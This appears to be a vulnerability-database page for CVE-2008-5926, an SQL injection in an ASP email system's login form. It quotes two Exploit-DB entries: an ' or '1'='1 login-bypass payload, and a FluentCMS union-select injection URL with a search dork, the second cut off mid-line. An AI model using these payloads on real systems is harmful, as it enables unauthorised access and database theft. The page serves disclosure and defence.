CVE-2008-5926
published 2009-01-21CVE-2008-5926: Multiple SQL injection vulnerabilities in login.asp in ASP-DEv Internal E-Mail System allow remote attackers to execute arbitrary SQL commands via the (1)…
PriorityP342high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
0.97%
57.6th percentile
Multiple SQL injection vulnerabilities in login.asp in ASP-DEv Internal E-Mail System allow remote attackers to execute arbitrary SQL commands via the (1) login parameter (aka user field) or the (2) password parameter (aka pass field). NOTE: some of these details are obtained from third party information.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
ASP-DEV Internal E-Mail System - Authentication Bypass
exploitdb·2008-12-14
CVE-2008-5926 ASP-DEV Internal E-Mail System - Authentication Bypass
ASP-DEV Internal E-Mail System - Authentication Bypass
---
#########################################################
Portal Name: Internal E-Mail System
Vendor : http://asp-dev.com/main.asp?page=41
Download : http://asp-dev.com/download.asp?did=4
Author : Pouya_Server , [email protected]
Vulnerability : (Auth Bypass) SQL Injection Vulnerability
#########################################################
[Auth Bypass]:
user: ' or '1'='1
pass: ' or '1'='1
Victem :
http://asp-dev.com/message
# milw0rm.com [2008-12-14]
Exploit-DB
FluentCMS - 'view.php' SQL Injection
exploitdb·2008-04-27
CVE-2008-6642 FluentCMS - 'view.php' SQL Injection
FluentCMS - 'view.php' SQL Injection
---
###################################################
[~] FluentCMS Remote Sql İnj. Vuln.
[~] Founder: cO2 [ Algeria Security Crew ]
[~] HomePage: http://www.DZ-Secure.com
[~] Greatz : To all Hackerz from Algeria & All My Friends . . .
[~] Contact: [email protected]
[~] Greetz2 : Str0ke,Inphex,DigitalMind,His0k4,Stack-Terrorist,mArEzZinA,Waraxe,Str0xo
[~] Speacial thanks to : Inphex
[~] Dork : Powered by FluentCMS
[~] Exploit :
http://www.xxx.org/view.php?sid=-5926+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,unhex(hex(version())),17,unhex(hex(user())),unhex(hex(database())),20,21,22,23,24,25,26,27,28,29,30,31,32--
or
http://www.xxx.org/view.php?sid=-3+union+select+1,2,3,unhex(hex(user())),5,6,7,unhex(hex(database())),9,10,11,12,13,14,unhex(hex(v
No writeups or analysis indexed.
http://secunia.com/advisories/33103http://securityreason.com/securityalert/4925http://www.securityfocus.com/bid/32808https://www.exploit-db.com/exploits/7447http://secunia.com/advisories/33103http://securityreason.com/securityalert/4925http://www.securityfocus.com/bid/32808https://www.exploit-db.com/exploits/7447
2009-01-21
Published